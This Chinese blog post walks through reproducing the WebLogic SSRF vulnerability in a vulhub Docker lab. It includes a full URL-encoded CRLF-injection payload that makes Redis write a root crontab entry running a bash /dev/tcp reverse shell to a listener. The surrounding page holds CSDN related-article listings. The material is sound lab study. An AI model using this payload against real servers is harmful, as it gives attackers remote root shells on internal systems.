weblogic ssrf漏洞复现

最新推荐文章于 2023-11-06 08:56:08 发布
最新推荐文章于 2023-11-06 08:56:08 发布
阅读量319 收藏
点赞数
分类专栏: 个人笔记 文章标签: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38415434/article/details/98539371
版权

采用的虚拟机环境为ubuntu16.04,在虚拟机上搭建好docker环境。采用的vulhub来进行复现。
使用git来下载,命令为git clone https://github.com/vulhub/vulhub.git
在这里插入图片描述
进入ssrf漏洞中,
cd /vulhub/weblogic/ssrf
在这里插入图片描述
创建漏洞环境
docker-compose up -d
在这里插入图片描述
查看容器
docker ps
在这里插入图片描述
虚拟机地址为192.168.6.136,访问http://192.168.6.136:7001/uddiexplorer/SearchPublicRegistries.jsp
在这里插入图片描述
成功创建漏洞环境。

ssrf漏洞测试
打开代理工具拦截http请求包

在这里插入图片描述
可以看到参数中存在一个网址,将参数改为http://192.168.6.136:7001
在这里插入图片描述
再访问一个不存在的端口
在这里插入图片描述
从两次不同的http请求包结果中可知,weblogic中存在这ssrf漏洞。
查看weblogic容器的地址
docker inspect 642ac3b75ae8
在这里插入图片描述
同理 docker inspect fe0822abff42
在这里插入图片描述
注入HTTP头,利用Redis的反弹shell
通过SSRF探测内网中的Redis的服务器
在这里插入图片描述
想redis服务器发送命令
set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/监听ip/port 0>&1\n\n\n\n”
config set dir /etc/
config set dbfilename crontab
save
利用回车换行将三条命令连接,换行符号的url编码为%od%oa,注入的代码为
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.19.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
在虚拟机中监听,容器的网关为172.19.0.1,即为虚拟机的地址。
在这里插入图片描述
发包
在这里插入图片描述
成功得到shell。
在这里插入图片描述
到此,漏洞成功复现。

taiduge1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weblogic ssrf 漏洞复现
薛定谔嘚喵博客
05-06 593
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
Weblogic SSRF漏洞复现
huangyongkang666的博客
07-22 1221
Weblogic SSRF漏洞复现
WebLogic SSRF漏洞复现
qq_36567469的博客
04-18 2823
weblogic ssrf漏洞复现
Weblogic ssrf漏洞复现
最新发布
wutiangui的博客
11-06 327
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上;SSRF漏洞就是通过篡改获取资源的请求发送给服务器,但是服务器并没有检测这个请求是否合法的,然后服务器以这个请求中的身份来访问其他服务器的资源。产生的原因:服务器端的验证并没有对其请求获取图片的参数(image=)做出严格的过滤以及限制,导致A网站可以从其他服务器的获取数据。安全的网站应接收请求后,检测请求的合法性。或者使用以下工具探测。
漏洞复现Weblogic SSRF漏洞复现
Miraitowax
02-22 935
Weblogic SSRF的漏洞原理,漏洞复现步骤详细总结及剖析
【vulhub】weblogic ssrf漏洞复现
weixin_53730939的博客
03-19 634
【vulhub】weblogic ssrf漏洞复现(详解)
Weblogic SSRF 漏洞复现
qq_45953122的博客
09-12 432
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
Weblogic SSRF漏洞复现(CVE-2014-4210)【vulhub靶场】
m0_55854679的博客
08-09 1449
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
weblogic ssrf漏洞复现
m0_71635484的博客
03-20 263
weblogic ssrf漏洞复现
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
雷石weblogic漏洞扫描工具
08-27
雷石weblogic漏洞扫描工具
weblogic相关漏洞
05-03
WebLogic 相关漏洞概述 WebLogic 是 Oracle 公司出品的一款 Java EE 应用服务器,广泛应用于企业级应用系统中。然而,WebLogic 也存在一些漏洞,可能会被攻击者利用,导致严重的安全问题。以下是 WebLogic 相关漏洞...
upload-labs详细全解
热门推荐
qq_38415434的博客
10-23 1万+
upload_labs详细全解: 第一关: 上传php后缀的文件被拦截 这时要猜测判断文件后缀的代码是在前端还是后端,打开burp进行拦截,发现点击上传后,并没有进行发包。可知判断后缀的代码在前端,即用js代码判断的,打开浏览器的审查元素,找到文件上传的js代码,发现 发现有一个checkFile()函数,推测可能是这个函数进行判断的,我们把它删除后再上传。 上传成功 右击图片,打开图片。 ...
sql-labs详细全解
qq_38415434的博客
10-23 4240
** sql-labs详细全解 ** 第一关: 常见的string注入: http://192.168.80.139/sqli-labs-master/Less-1/?id=1 构造url: 1.http://192.168.80.139/sqli-labs-master/Less-1/?id=1’ 报错 2.http://192.168.80.139/sqli-labs-master/Les...
常见的端口及对应的服务
qq_38415434的博客
12-07 2077
代理服务器常用以下端口: ⑴. HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080 ⑵. SOCKS代理协议服务器常用端口号:1080 ⑶. FTP(文件传输)协议代理服务器常用端口号:21 ⑷. Telnet(远程登录)协议代理服务器常用端口:23 HTTP服务器,默认的端口号为80/tcp(木马Executor开放此端口); HTTPS(securely trans...
Fastjson1.0漏洞复现
qq_38415434的博客
12-29 1311
服务器kali linux 攻击机win10 搭建好环境之后,测试漏洞 证明存在漏洞 生成payload {"@type":“com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl”,"_bytecodes":[“yv66vgAAADQAsAcAAgEAF2NvbS9zZWNmcmVlL3d3dy9QYXlsb2FkBwAEAQBAY...
vulhub weblogic ssrf漏洞
03-16
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值